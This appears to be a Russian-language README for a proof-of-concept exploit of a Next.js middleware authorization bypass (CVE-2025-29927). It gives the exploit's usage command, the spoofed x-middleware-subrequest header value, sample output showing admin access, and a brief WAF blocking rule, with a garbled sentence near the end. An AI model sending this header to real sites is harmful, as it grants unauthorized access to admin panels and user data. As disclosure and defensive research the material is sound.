
Вот простой, но эффективный эксплойт для CVE-2025-29927.
Этот репозиторий содержит эксплойт Proof of Concept (PoC) для CVE-2025-29927 — критической уязвимости в Next.js, которая позволяет злоумышленникам обходить проверки авторизации, злоупотребляя специфическим для middleware HTTP-заголовком.
Приложения Next.js часто полагаются на middleware для авторизации и контроля доступа. Данная CVE возникает из-за логической ошибки в обработке заголовка x-middleware-subrequest. Когда этот заголовок установлен в middleware, сервер может ошибочно предположить, что запрос поступил из внутренней логики, и обойти авторизацию на основе middleware.
Это может позволить злоумышленникам получить доступ к панелям администратора, защищенным API или пользовательским данным —
Мы предоставляем простой Python-скрипт для проверки уязвимости приложения Next.js.
python3 exploit.py --url https://target.com --path /admin [--proxy http://127.0.0.1:8080]
[+] Sending request to: https://target.com/admin
[+] Using header: x-middleware-subrequest: middleware
[+] Status Code: 200
[+] Response Body (first 500 chars):
<!DOCTYPE html><html><head>...You are logged in as admin...
x-middleware-subrequest как сигнала доверия.Логика WAF:
if header 'x-middleware-subrequest' == 'middleware':
block_request()
Данный PoC был разработан командой Offensive Security Team в W2H Corp. в рамках наших постоянных исследований уязвимостей. Оригинальная статья с объяснением CVE находится здесь.